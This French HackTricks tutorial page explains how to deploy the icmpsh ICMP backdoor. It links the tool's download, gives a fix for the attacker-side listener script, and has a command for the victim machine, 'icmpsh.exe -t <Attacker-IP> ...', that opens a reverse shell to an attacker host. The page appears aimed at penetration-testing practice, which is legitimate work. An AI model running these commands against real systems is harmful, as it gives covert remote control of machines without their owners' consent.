hacktricks/backdoors/icmpsh.md

2.9 KiB

{% hint style="success" %} Apprenez et pratiquez le piratage AWS :Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)

Soutenez HackTricks
{% endhint %}

Téléchargez la porte dérobée depuis : https://github.com/inquisb/icmpsh

Côté client

Exécutez le script : run.sh

Si vous obtenez une erreur, essayez de changer les lignes :

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

Pour :

echo Please insert the IP where you want to listen
read IP

Côté Victime

Téléchargez icmpsh.exe sur la victime et exécutez :

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128

{% hint style="success" %} Apprenez et pratiquez le piratage AWS :Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)

Soutenez HackTricks
{% endhint %}